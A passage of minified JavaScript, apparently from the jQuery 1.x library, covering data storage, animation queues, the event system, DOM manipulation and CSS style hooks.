u(e,t,!0)}}),re.fn.extend({data:function(e,t){var n,i,r,o=this[0],s=o&&o.attributes;if(void 0===e){if(this.length&&(r=re.data(o),1===o.nodeType&&!re._data(o,"parsedAttrs"))){for(n=s.length;n--;)s[n]&&(i=s[n].name,0===i.indexOf("data-")&&(i=re.camelCase(i.slice(5)),l(o,i,r[i])));re._data(o,"parsedAttrs",!0)}return r}return"object"==typeof e?this.each(function(){re.data(this,e)}):arguments.length>1?this.each(function(){re.data(this,e,t)}):o?l(o,e,re.data(o,e)):void 0},removeData:function(e){return this.each(function(){re.removeData(this,e)})}}),re.extend({queue:function(e,t,n){var i;return e?(t=(t||"fx")+"queue",i=re._data(e,t),n&&(!i||re.isArray(n)?i=re._data(e,t,re.makeArray(n)):i.push(n)),i||[]):void 0},dequeue:function(e,t){t=t||"fx";var n=re.queue(e,t),i=n.length,r=n.shift(),o=re._queueHooks(e,t),s=function(){re.dequeue(e,t)};"inprogress"===r&&(r=n.shift(),i--),r&&("fx"===t&&n.unshift("inprogress"),delete o.stop,r.call(e,s,o)),!i&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return re._data(e,n)||re._data(e,n,{empty:re.Callbacks("once memory").add(function(){re._removeData(e,t+"queue"),re._removeData(e,n)})})}}),re.fn.extend({queue:function(e,t){var n=2;return"string"!=typeof e&&(t=e,e="fx",n--),arguments.length<n?re.queue(this[0],e):void 0===t?this:this.each(function(){var n=re.queue(this,e,t);re._queueHooks(this,e),"fx"===e&&"inprogress"!==n[0]&&re.dequeue(this,e)})},dequeue:function(e){return this.each(function(){re.dequeue(this,e)})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,t){var n,i=1,r=re.Deferred(),o=this,s=this.length,a=function(){--i||r.resolveWith(o,[o])};for("string"!=typeof e&&(t=e,e=void 0),e=e||"fx";s--;)n=re._data(o[s],e+"queueHooks"),n&&n.empty&&(i++,n.empty.add(a));return a(),r.promise(t)}});var Ce=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,Me=["Top","Right","Bottom","Left"],ke=function(e,t){return e=t||e,"none"===re.css(e,"display")||!re.contains(e.ownerDocument,e)},ze=re.access=function(e,t,n,i,r,o,s){var a=0,l=e.length,d=null==n;if("object"===re.type(n)){r=!0;for(a in n)re.access(e,t,a,n[a],!0,o,s)}else if(void 0!==i&&(r=!0,re.isFunction(i)||(s=!0),d&&(s?(t.call(e,i),t=null):(d=t,t=function(e,t,n){return d.call(re(e),n)})),t))for(;l>a;a++)t(e[a],n,s?i:i.call(e[a],a,t(e[a],n)));return r?e:d?t.call(e):l?t(e[0],n):o},Se=/^(?:checkbox|radio)$/i;!function(){var e=he.createElement("input"),t=he.createElement("div"),n=he.createDocumentFragment();if(t.innerHTML=" <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",ne.leadingWhitespace=3===t.firstChild.nodeType,ne.tbody=!t.getElementsByTagName("tbody").length,ne.htmlSerialize=!!t.getElementsByTagName("link").length,ne.html5Clone="<:nav></:nav>"!==he.createElement("nav").cloneNode(!0).outerHTML,e.type="checkbox",e.checked=!0,n.appendChild(e),ne.appendChecked=e.checked,t.innerHTML="<textarea>x</textarea>",ne.noCloneChecked=!!t.cloneNode(!0).lastChild.defaultValue,n.appendChild(t),t.innerHTML="<input type='radio' checked='checked' name='t'/>",ne.checkClone=t.cloneNode(!0).cloneNode(!0).lastChild.checked,ne.noCloneEvent=!0,t.attachEvent&&(t.attachEvent("onclick",function(){ne.noCloneEvent=!1}),t.cloneNode(!0).click()),null==ne.deleteExpando){ne.deleteExpando=!0;try{delete t.test}catch(i){ne.deleteExpando=!1}}}(),function(){var t,n,i=he.createElement("div");for(t in{submit:!0,change:!0,focusin:!0})n="on"+t,(ne[t+"Bubbles"]=n in e)||(i.setAttribute(n,"t"),ne[t+"Bubbles"]=i.attributes[n].expando===!1);i=null}();var Be=/^(?:input|select|textarea)$/i,Ne=/^key/,Pe=/^(?:mouse|pointer|contextmenu)|click/,je=/^(?:focusinfocus|focusoutblur)$/,Re=/^([^.]*)(?:\.(.+)|)$/;re.event={global:{},add:function(e,t,n,i,r){var o,s,a,l,d,c,u,p,f,h,m,g=re._data(e);if(g){for(n.handler&&(l=n,n=l.handler,r=l.selector),n.guid||(n.guid=re.guid++),(s=g.events)||(s=g.events={}),(c=g.handle)||(c=g.handle=function(e){return typeof re===xe||e&&re.event.triggered===e.type?void 0:re.event.dispatch.apply(c.elem,arguments)},c.elem=e),t=(t||"").match(ye)||[""],a=t.length;a--;)o=Re.exec(t[a])||[],f=m=o[1],h=(o[2]||"").split(".").sort(),f&&(d=re.event.special[f]||{},f=(r?d.delegateType:d.bindType)||f,d=re.event.special[f]||{},u=re.extend({type:f,origType:m,data:i,handler:n,guid:n.guid,selector:r,needsContext:r&&re.expr.match.needsContext.test(r),namespace:h.join(".")},l),(p=s[f])||(p=s[f]=[],p.delegateCount=0,d.setup&&d.setup.call(e,i,h,c)!==!1||(e.addEventListener?e.addEventListener(f,c,!1):e.attachEvent&&e.attachEvent("on"+f,c))),d.add&&(d.add.call(e,u),u.handler.guid||(u.handler.guid=n.guid)),r?p.splice(p.delegateCount++,0,u):p.push(u),re.event.global[f]=!0);e=null}},remove:function(e,t,n,i,r){var o,s,a,l,d,c,u,p,f,h,m,g=re.hasData(e)&&re._data(e);if(g&&(c=g.events)){for(t=(t||"").match(ye)||[""],d=t.length;d--;)if(a=Re.exec(t[d])||[],f=m=a[1],h=(a[2]||"").split(".").sort(),f){for(u=re.event.special[f]||{},f=(i?u.delegateType:u.bindType)||f,p=c[f]||[],a=a[2]&&new RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),l=o=p.length;o--;)s=p[o],!r&&m!==s.origType||n&&n.guid!==s.guid||a&&!a.test(s.namespace)||i&&i!==s.selector&&("**"!==i||!s.selector)||(p.splice(o,1),s.selector&&p.delegateCount--,u.remove&&u.remove.call(e,s));l&&!p.length&&(u.teardown&&u.teardown.call(e,h,g.handle)!==!1||re.removeEvent(e,f,g.handle),delete c[f])}else for(f in c)re.event.remove(e,f+t[d],n,i,!0);re.isEmptyObject(c)&&(delete g.handle,re._removeData(e,"events"))}},trigger:function(t,n,i,r){var o,s,a,l,d,c,u,p=[i||he],f=te.call(t,"type")?t.type:t,h=te.call(t,"namespace")?t.namespace.split("."):[];if(a=c=i=i||he,3!==i.nodeType&&8!==i.nodeType&&!je.test(f+re.event.triggered)&&(f.indexOf(".")>=0&&(h=f.split("."),f=h.shift(),h.sort()),s=f.indexOf(":")<0&&"on"+f,t=t[re.expando]?t:new re.Event(f,"object"==typeof t&&t),t.isTrigger=r?2:3,t.namespace=h.join("."),t.namespace_re=t.namespace?new RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,t.result=void 0,t.target||(t.target=i),n=null==n?[t]:re.makeArray(n,[t]),d=re.event.special[f]||{},r||!d.trigger||d.trigger.apply(i,n)!==!1)){if(!r&&!d.noBubble&&!re.isWindow(i)){for(l=d.delegateType||f,je.test(l+f)||(a=a.parentNode);a;a=a.parentNode)p.push(a),c=a;c===(i.ownerDocument||he)&&p.push(c.defaultView||c.parentWindow||e)}for(u=0;(a=p[u++])&&!t.isPropagationStopped();)t.type=u>1?l:d.bindType||f,o=(re._data(a,"events")||{})[t.type]&&re._data(a,"handle"),o&&o.apply(a,n),o=s&&a[s],o&&o.apply&&re.acceptData(a)&&(t.result=o.apply(a,n),t.result===!1&&t.preventDefault());if(t.type=f,!r&&!t.isDefaultPrevented()&&(!d._default||d._default.apply(p.pop(),n)===!1)&&re.acceptData(i)&&s&&i[f]&&!re.isWindow(i)){c=i[s],c&&(i[s]=null),re.event.triggered=f;try{i[f]()}catch(m){}re.event.triggered=void 0,c&&(i[s]=c)}return t.result}},dispatch:function(e){e=re.event.fix(e);var t,n,i,r,o,s=[],a=Y.call(arguments),l=(re._data(this,"events")||{})[e.type]||[],d=re.event.special[e.type]||{};if(a[0]=e,e.delegateTarget=this,!d.preDispatch||d.preDispatch.call(this,e)!==!1){for(s=re.event.handlers.call(this,e,l),t=0;(r=s[t++])&&!e.isPropagationStopped();)for(e.currentTarget=r.elem,o=0;(i=r.handlers[o++])&&!e.isImmediatePropagationStopped();)e.namespace_re&&!e.namespace_re.test(i.namespace)||(e.handleObj=i,e.data=i.data,n=((re.event.special[i.origType]||{}).handle||i.handler).apply(r.elem,a),void 0!==n&&(e.result=n)===!1&&(e.preventDefault(),e.stopPropagation()));return d.postDispatch&&d.postDispatch.call(this,e),e.result}},handlers:function(e,t){var n,i,r,o,s=[],a=t.delegateCount,l=e.target;if(a&&l.nodeType&&(!e.button||"click"!==e.type))for(;l!=this;l=l.parentNode||this)if(1===l.nodeType&&(l.disabled!==!0||"click"!==e.type)){for(r=[],o=0;a>o;o++)i=t[o],n=i.selector+" ",void 0===r[n]&&(r[n]=i.needsContext?re(n,this).index(l)>=0:re.find(n,this,null,[l]).length),r[n]&&r.push(i);r.length&&s.push({elem:l,handlers:r})}return a<t.length&&s.push({elem:this,handlers:t.slice(a)}),s},fix:function(e){if(e[re.expando])return e;var t,n,i,r=e.type,o=e,s=this.fixHooks[r];for(s||(this.fixHooks[r]=s=Pe.test(r)?this.mouseHooks:Ne.test(r)?this.keyHooks:{}),i=s.props?this.props.concat(s.props):this.props,e=new re.Event(o),t=i.length;t--;)n=i[t],e[n]=o[n];return e.target||(e.target=o.srcElement||he),3===e.target.nodeType&&(e.target=e.target.parentNode),e.metaKey=!!e.metaKey,s.filter?s.filter(e,o):e},props:"altKey bubbles cancelable ctrlKey currentTarget eventPhase metaKey relatedTarget shiftKey target timeStamp view which".split(" "),fixHooks:{},keyHooks:{props:"char charCode key keyCode".split(" "),filter:function(e,t){return null==e.which&&(e.which=null!=t.charCode?t.charCode:t.keyCode),e}},mouseHooks:{props:"button buttons clientX clientY fromElement offsetX offsetY pageX pageY screenX screenY toElement".split(" "),filter:function(e,t){var n,i,r,o=t.button,s=t.fromElement;return null==e.pageX&&null!=t.clientX&&(i=e.target.ownerDocument||he,r=i.documentElement,n=i.body,e.pageX=t.clientX+(r&&r.scrollLeft||n&&n.scrollLeft||0)-(r&&r.clientLeft||n&&n.clientLeft||0),e.pageY=t.clientY+(r&&r.scrollTop||n&&n.scrollTop||0)-(r&&r.clientTop||n&&n.clientTop||0)),!e.relatedTarget&&s&&(e.relatedTarget=s===e.target?t.toElement:s),e.which||void 0===o||(e.which=1&o?1:2&o?3:4&o?2:0),e}},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==h()&&this.focus)try{return this.focus(),!1}catch(e){}},delegateType:"focusin"},blur:{trigger:function(){return this===h()&&this.blur?(this.blur(),!1):void 0},delegateType:"focusout"},click:{trigger:function(){return re.nodeName(this,"input")&&"checkbox"===this.type&&this.click?(this.click(),!1):void 0},_default:function(e){return re.nodeName(e.target,"a")}},beforeunload:{postDispatch:function(e){void 0!==e.result&&e.originalEvent&&(e.originalEvent.returnValue=e.result)}}},simulate:function(e,t,n,i){var r=re.extend(new re.Event,n,{type:e,isSimulated:!0,originalEvent:{}});i?re.event.trigger(r,null,t):re.event.dispatch.call(t,r),r.isDefaultPrevented()&&n.preventDefault()}},re.removeEvent=he.removeEventListener?function(e,t,n){e.removeEventListener&&e.removeEventListener(t,n,!1)}:function(e,t,n){var i="on"+t;e.detachEvent&&(typeof e[i]===xe&&(e[i]=null),e.detachEvent(i,n))},re.Event=function(e,t){return this instanceof re.Event?(e&&e.type?(this.originalEvent=e,this.type=e.type,this.isDefaultPrevented=e.defaultPrevented||void 0===e.defaultPrevented&&e.returnValue===!1?p:f):this.type=e,t&&re.extend(this,t),this.timeStamp=e&&e.timeStamp||re.now(),void(this[re.expando]=!0)):new re.Event(e,t)},re.Event.prototype={isDefaultPrevented:f,isPropagationStopped:f,isImmediatePropagationStopped:f,preventDefault:function(){var e=this.originalEvent;this.isDefaultPrevented=p,e&&(e.preventDefault?e.preventDefault():e.returnValue=!1)},stopPropagation:function(){var e=this.originalEvent;this.isPropagationStopped=p,e&&(e.stopPropagation&&e.stopPropagation(),e.cancelBubble=!0)},stopImmediatePropagation:function(){var e=this.originalEvent;this.isImmediatePropagationStopped=p,e&&e.stopImmediatePropagation&&e.stopImmediatePropagation(),this.stopPropagation()}},re.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(e,t){re.event.special[e]={delegateType:t,bindType:t,handle:function(e){var n,i=this,r=e.relatedTarget,o=e.handleObj;return r&&(r===i||re.contains(i,r))||(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),ne.submitBubbles||(re.event.special.submit={setup:function(){return re.nodeName(this,"form")?!1:void re.event.add(this,"click._submit keypress._submit",function(e){var t=e.target,n=re.nodeName(t,"input")||re.nodeName(t,"button")?t.form:void 0;n&&!re._data(n,"submitBubbles")&&(re.event.add(n,"submit._submit",function(e){e._submit_bubble=!0}),re._data(n,"submitBubbles",!0))})},postDispatch:function(e){e._submit_bubble&&(delete e._submit_bubble,this.parentNode&&!e.isTrigger&&re.event.simulate("submit",this.parentNode,e,!0))},teardown:function(){return re.nodeName(this,"form")?!1:void re.event.remove(this,"._submit")}}),ne.changeBubbles||(re.event.special.change={setup:function(){return Be.test(this.nodeName)?("checkbox"!==this.type&&"radio"!==this.type||(re.event.add(this,"propertychange._change",function(e){"checked"===e.originalEvent.propertyName&&(this._just_changed=!0)}),re.event.add(this,"click._change",function(e){this._just_changed&&!e.isTrigger&&(this._just_changed=!1),re.event.simulate("change",this,e,!0)})),!1):void re.event.add(this,"beforeactivate._change",function(e){var t=e.target;Be.test(t.nodeName)&&!re._data(t,"changeBubbles")&&(re.event.add(t,"change._change",function(e){!this.parentNode||e.isSimulated||e.isTrigger||re.event.simulate("change",this.parentNode,e,!0)}),re._data(t,"changeBubbles",!0))})},handle:function(e){var t=e.target;return this!==t||e.isSimulated||e.isTrigger||"radio"!==t.type&&"checkbox"!==t.type?e.handleObj.handler.apply(this,arguments):void 0},teardown:function(){return re.event.remove(this,"._change"),!Be.test(this.nodeName)}}),ne.focusinBubbles||re.each({focus:"focusin",blur:"focusout"},function(e,t){var n=function(e){re.event.simulate(t,e.target,re.event.fix(e),!0)};re.event.special[t]={setup:function(){var i=this.ownerDocument||this,r=re._data(i,t);r||i.addEventListener(e,n,!0),re._data(i,t,(r||0)+1)},teardown:function(){var i=this.ownerDocument||this,r=re._data(i,t)-1;r?re._data(i,t,r):(i.removeEventListener(e,n,!0),re._removeData(i,t))}}}),re.fn.extend({on:function(e,t,n,i,r){var o,s;if("object"==typeof e){"string"!=typeof t&&(n=n||t,t=void 0);for(o in e)this.on(o,t,n,e[o],r);return this}if(null==n&&null==i?(i=t,n=t=void 0):null==i&&("string"==typeof t?(i=n,n=void 0):(i=n,n=t,t=void 0)),i===!1)i=f;else if(!i)return this;return 1===r&&(s=i,i=function(e){return re().off(e),s.apply(this,arguments)},i.guid=s.guid||(s.guid=re.guid++)),this.each(function(){re.event.add(this,e,i,n,t)})},one:function(e,t,n,i){return this.on(e,t,n,i,1)},off:function(e,t,n){var i,r;if(e&&e.preventDefault&&e.handleObj)return i=e.handleObj,re(e.delegateTarget).off(i.namespace?i.origType+"."+i.namespace:i.origType,i.selector,i.handler),this;if("object"==typeof e){for(r in e)this.off(r,t,e[r]);return this}return t!==!1&&"function"!=typeof t||(n=t,t=void 0),n===!1&&(n=f),this.each(function(){re.event.remove(this,e,n,t)})},trigger:function(e,t){return this.each(function(){re.event.trigger(e,t,this)})},triggerHandler:function(e,t){var n=this[0];return n?re.event.trigger(e,t,n,!0):void 0}});var De="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",Fe=/ jQuery\d+="(?:null|\d+)"/g,Ie=new RegExp("<(?:"+De+")[\\s/>]","i"),Le=/^\s+/,He=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,Oe=/<([\w:]+)/,Qe=/<tbody/i,We=/<|&#?\w+;/,qe=/<(?:script|style|link)/i,Ue=/checked\s*(?:[^=]|=\s*.checked.)/i,Ve=/^$|\/(?:java|ecma)script/i,Ge=/^true\/(.*)/,$e=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,Ye={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:ne.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},Ze=m(he),Je=Ze.appendChild(he.createElement("div"));Ye.optgroup=Ye.option,Ye.tbody=Ye.tfoot=Ye.colgroup=Ye.caption=Ye.thead,Ye.th=Ye.td,re.extend({clone:function(e,t,n){var i,r,o,s,a,l=re.contains(e.ownerDocument,e);if(ne.html5Clone||re.isXMLDoc(e)||!Ie.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(Je.innerHTML=e.outerHTML,Je.removeChild(o=Je.firstChild)),!(ne.noCloneEvent&&ne.noCloneChecked||1!==e.nodeType&&11!==e.nodeType||re.isXMLDoc(e)))for(i=g(o),a=g(e),s=0;null!=(r=a[s]);++s)i[s]&&x(r,i[s]);if(t)if(n)for(a=a||g(e),i=i||g(o),s=0;null!=(r=a[s]);s++)_(r,i[s]);else _(e,o);return i=g(o,"script"),i.length>0&&w(i,!l&&g(e,"script")),i=a=r=null,o},buildFragment:function(e,t,n,i){for(var r,o,s,a,l,d,c,u=e.length,p=m(t),f=[],h=0;u>h;h++)if(o=e[h],o||0===o)if("object"===re.type(o))re.merge(f,o.nodeType?[o]:o);else if(We.test(o)){for(a=a||p.appendChild(t.createElement("div")),l=(Oe.exec(o)||["",""])[1].toLowerCase(),c=Ye[l]||Ye._default,a.innerHTML=c[1]+o.replace(He,"<$1></$2>")+c[2],r=c[0];r--;)a=a.lastChild;if(!ne.leadingWhitespace&&Le.test(o)&&f.push(t.createTextNode(Le.exec(o)[0])),!ne.tbody)for(o="table"!==l||Qe.test(o)?"<table>"!==c[1]||Qe.test(o)?0:a:a.firstChild,r=o&&o.childNodes.length;r--;)re.nodeName(d=o.childNodes[r],"tbody")&&!d.childNodes.length&&o.removeChild(d);for(re.merge(f,a.childNodes),a.textContent="";a.firstChild;)a.removeChild(a.firstChild);a=p.lastChild}else f.push(t.createTextNode(o));for(a&&p.removeChild(a),ne.appendChecked||re.grep(g(f,"input"),A),h=0;o=f[h++];)if((!i||-1===re.inArray(o,i))&&(s=re.contains(o.ownerDocument,o),a=g(p.appendChild(o),"script"),s&&w(a),n))for(r=0;o=a[r++];)Ve.test(o.type||"")&&n.push(o);return a=null,p},cleanData:function(e,t){for(var n,i,r,o,s=0,a=re.expando,l=re.cache,d=ne.deleteExpando,c=re.event.special;null!=(n=e[s]);s++)if((t||re.acceptData(n))&&(r=n[a],o=r&&l[r])){if(o.events)for(i in o.events)c[i]?re.event.remove(n,i):re.removeEvent(n,i,o.handle);l[r]&&(delete l[r],d?delete n[a]:typeof n.removeAttribute!==xe?n.removeAttribute(a):n[a]=null,$.push(r))}}}),re.fn.extend({text:function(e){return ze(this,function(e){return void 0===e?re.text(this):this.empty().append((this[0]&&this[0].ownerDocument||he).createTextNode(e))},null,e,arguments.length)},append:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=v(this,e);t.appendChild(e)}})},prepend:function(){return this.domManip(arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=v(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this)})},after:function(){return this.domManip(arguments,function(e){this.parentNode&&this.parentNode.insertBefore(e,this.nextSibling)})},remove:function(e,t){for(var n,i=e?re.filter(e,this):this,r=0;null!=(n=i[r]);r++)t||1!==n.nodeType||re.cleanData(g(n)),n.parentNode&&(t&&re.contains(n.ownerDocument,n)&&w(g(n,"script")),n.parentNode.removeChild(n));return this},empty:function(){for(var e,t=0;null!=(e=this[t]);t++){for(1===e.nodeType&&re.cleanData(g(e,!1));e.firstChild;)e.removeChild(e.firstChild);e.options&&re.nodeName(e,"select")&&(e.options.length=0)}return this},clone:function(e,t){return e=null==e?!1:e,t=null==t?e:t,this.map(function(){return re.clone(this,e,t)})},html:function(e){return ze(this,function(e){var t=this[0]||{},n=0,i=this.length;if(void 0===e)return 1===t.nodeType?t.innerHTML.replace(Fe,""):void 0;if("string"==typeof e&&!qe.test(e)&&(ne.htmlSerialize||!Ie.test(e))&&(ne.leadingWhitespace||!Le.test(e))&&!Ye[(Oe.exec(e)||["",""])[1].toLowerCase()]){e=e.replace(He,"<$1></$2>");try{for(;i>n;n++)t=this[n]||{},1===t.nodeType&&(re.cleanData(g(t,!1)),t.innerHTML=e);t=0}catch(r){}}t&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(){var e=arguments[0];return this.domManip(arguments,function(t){e=this.parentNode,re.cleanData(g(this)),e&&e.replaceChild(t,this)}),e&&(e.length||e.nodeType)?this:this.remove()},detach:function(e){return this.remove(e,!0)},domManip:function(e,t){e=Z.apply([],e);var n,i,r,o,s,a,l=0,d=this.length,c=this,u=d-1,p=e[0],f=re.isFunction(p);if(f||d>1&&"string"==typeof p&&!ne.checkClone&&Ue.test(p))return this.each(function(n){var i=c.eq(n);f&&(e[0]=p.call(this,n,i.html())),i.domManip(e,t)});if(d&&(a=re.buildFragment(e,this[0].ownerDocument,!1,this),n=a.firstChild,1===a.childNodes.length&&(a=n),n)){for(o=re.map(g(a,"script"),y),r=o.length;d>l;l++)i=a,l!==u&&(i=re.clone(i,!0,!0),r&&re.merge(o,g(i,"script"))),t.call(this[l],i,l);if(r)for(s=o[o.length-1].ownerDocument,re.map(o,b),l=0;r>l;l++)i=o[l],Ve.test(i.type||"")&&!re._data(i,"globalEval")&&re.contains(s,i)&&(i.src?re._evalUrl&&re._evalUrl(i.src):re.globalEval((i.text||i.textContent||i.innerHTML||"").replace($e,"")));a=n=null}return this}}),re.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){re.fn[e]=function(e){for(var n,i=0,r=[],o=re(e),s=o.length-1;s>=i;i++)n=i===s?this:this.clone(!0),re(o[i])[t](n),J.apply(r,n.get());return this.pushStack(r)}});var Xe,Ke={};!function(){var e;ne.shrinkWrapBlocks=function(){if(null!=e)return e;e=!1;var t,n,i;return n=he.getElementsByTagName("body")[0],n&&n.style?(t=he.createElement("div"),i=he.createElement("div"),i.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",n.appendChild(i).appendChild(t),typeof t.style.zoom!==xe&&(t.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:1px;width:1px;zoom:1",t.appendChild(he.createElement("div")).style.width="5px",e=3!==t.offsetWidth),n.removeChild(i),e):void 0}}();var et,tt,nt=/^margin/,it=new RegExp("^("+Ce+")(?!px)[a-z%]+$","i"),rt=/^(top|right|bottom|left)$/;e.getComputedStyle?(et=function(e){return e.ownerDocument.defaultView.getComputedStyle(e,null)},tt=function(e,t,n){var i,r,o,s,a=e.style;return n=n||et(e),s=n?n.getPropertyValue(t)||n[t]:void 0,n&&(""!==s||re.contains(e.ownerDocument,e)||(s=re.style(e,t)),it.test(s)&&nt.test(t)&&(i=a.width,r=a.minWidth,o=a.maxWidth,a.minWidth=a.maxWidth=a.width=s,s=n.width,a.width=i,a.minWidth=r,a.maxWidth=o)),void 0===s?s:s+""}):he.documentElement.currentStyle&&(et=function(e){return e.currentStyle},tt=function(e,t,n){var i,r,o,s,a=e.style;return n=n||et(e),s=n?n[t]:void 0,null==s&&a&&a[t]&&(s=a[t]),it.test(s)&&!rt.test(t)&&(i=a.left,r=e.runtimeStyle,o=r&&r.left,o&&(r.left=e.currentStyle.left),a.left="fontSize"===t?"1em":s,s=a.pixelLeft+"px",a.left=i,o&&(r.left=o)),void 0===s?s:s+""||"auto"}),function(){function t(){var t,n,i,r;n=he.getElementsByTagName("body")[0],n&&n.style&&(t=he.createElement("div"),i=he.createElement("div"),i.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",n.appendChild(i).appendChild(t),t.style.cssText="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;display:block;margin-top:1%;top:1%;border:1px;padding:1px;width:4px;position:absolute",o=s=!1,l=!0,e.getComputedStyle&&(o="1%"!==(e.getComputedStyle(t,null)||{}).top,s="4px"===(e.getComputedStyle(t,null)||{width:"4px"}).width,r=t.appendChild(he.createElement("div")),r.style.cssText=t.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:0",r.style.marginRight=r.style.width="0",t.style.width="1px",l=!parseFloat((e.getComputedStyle(r,null)||{}).marginRight)),t.innerHTML="<table><tr><td></td><td>t</td></tr></table>",r=t.getElementsByTagName("td"),r[0].style.cssText="margin:0;border:0;padding:0;display:none",a=0===r[0].offsetHeight,a&&(r[0].style.display="",r[1].style.display="none",a=0===r[0].offsetHeight),n.removeChild(i)); }var n,i,r,o,s,a,l;n=he.createElement("div"),n.innerHTML=" <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",r=n.getElementsByTagName("a")[0],i=r&&r.style,i&&(i.cssText="float:left;opacity:.5",ne.opacity="0.5"===i.opacity,ne.cssFloat=!!i.cssFloat,n.style.backgroundClip="content-box",n.cloneNode(!0).style.backgroundClip="",ne.clearCloneStyle="content-box"===n.style.backgroundClip,ne.boxSizing=""===i.boxSizing||""===i.MozBoxSizing||""===i.WebkitBoxSizing,re.extend(ne,{reliableHiddenOffsets:function(){return null==a&&t(),a},boxSizingReliable:function(){return null==s&&t(),s},pixelPosition:function(){return null==o&&t(),o},reliableMarginRight:function(){return null==l&&t(),l}}))}(),re.swap=function(e,t,n,i){var r,o,s={};for(o in t)s[o]=e.style[o],e.style[o]=t[o];r=n.apply(e,i||[]);for(o in t)e.style[o]=s[o];return r};var ot=/alpha\([^)]*\)/i,st=/opacity\s*=\s*([^)]*)/,at=/^(none|table(?!-c[ea]).+)/,lt=new RegExp("^("+Ce+")(.*)$","i"),dt=new RegExp("^([+-])=("+Ce+")","i"),ct={position:"absolute",visibility:"hidden",display:"block"},ut={letterSpacing:"0",fontWeight:"400"},pt=["Webkit","O","Moz","ms"];re.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=tt(e,"opacity");return""===n?"1":n}}}},cssNumber:{columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":ne.cssFloat?"cssFloat":"styleFloat"},style:function(e,t,n,i){if(e&&3!==e.nodeType&&8!==e.nodeType&&e.style){var r,o,s,a=re.camelCase(t),l=e.style;if(t=re.cssProps[a]||(re.cssProps[a]=M(l,a)),s=re.cssHooks[t]||re.cssHooks[a],void 0===n)return s&&"get"in s&&void 0!==(r=s.get(e,!1,i))?r:l[t];if(o=typeof n,"string"===o&&(r=dt.exec(n))&&(n=(r[1]+1)*r[2]+parseFloat(re.css(e,t)),o="number"),null!=n&&n===n&&("number"!==o||re.cssNumber[a]||(n+="px"),ne.clearCloneStyle||""!==n||0!==t.indexOf("background")||(l[t]="inherit"),!(s&&"set"in s&&void 0===(n=s.set(e,n,i)))))try{l[t]=n}catch(d){}}},css:function(e,t,n,i){var r,o,s,a=re.camelCase(t);return t=re.cssProps[a]||(re.cssProps[a]=M(e.style,a)),s=re.cssHooks[t]||re.cssHooks[a],s&&"get"in s&&(o=s.get(e,!0,n)),void 0===o&&(o=tt(e,t,i)),"normal"===o&&t in ut&&(o=ut[t]),""===n||n?(r=parseFloat(o),n===!0||re.isNumeric(r)?r||0:o):o}}),re.each(["height","width"],function(e,t){re.cssHooks[t]={get:function(e,n,i){return n?at.test(re.css(e,"display"))&&0===e.offsetWidth?re.swap(e,ct,function(){return B(e,t,i)}):B(e,t,i):void 0},set:function(e,n,i){var r=i&&et(e);return z(e,n,i?S(e,t,i,ne.boxSizing&&"border-box"===re.css(e,"boxSizing",!1,r),r):0)}}}),ne.opacity||(re.cssHooks.opacity={get:function(e,t){return st.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":t?"1":""},set:function(e,t){var n=e.style,i=e.currentStyle,r=re.isNumeric(t)?"alpha(opacity="+100*t+")":"",o=i&&i.filter||n.filter||"";n.zoom=1,(t>=1||""===t)&&""===re.trim(o.replace(ot,""))&&n.removeAttribute&&(n.removeAttribute("filter"),""===t||i&&!i.filter)||(n.filter=ot.test(o)?o.replace(ot,r):o+" "+r)}}),re.cssHooks.marginRight=C(ne.reliableMarginRight,function(e,t){return t?re.swap(e,{display:"inline-block"},tt,[e,"marginRight"]):void 0}),re.each({margin:"",padding:"",border:"Width"},function(e,t){re.cssHooks[e+t]={expand:function(n){for(var i=0,r={},o="string"==typeof n?n.split(" "):[n];4>i;i++)r[e+Me[i]+t]=o[i]||o[i-2]||o[0];return r}},nt.test(e)||(re.cssHooks[e+t].set=z)}),re.fn.extend({css:function(e,t){return ze(this,function(e,t,n){var 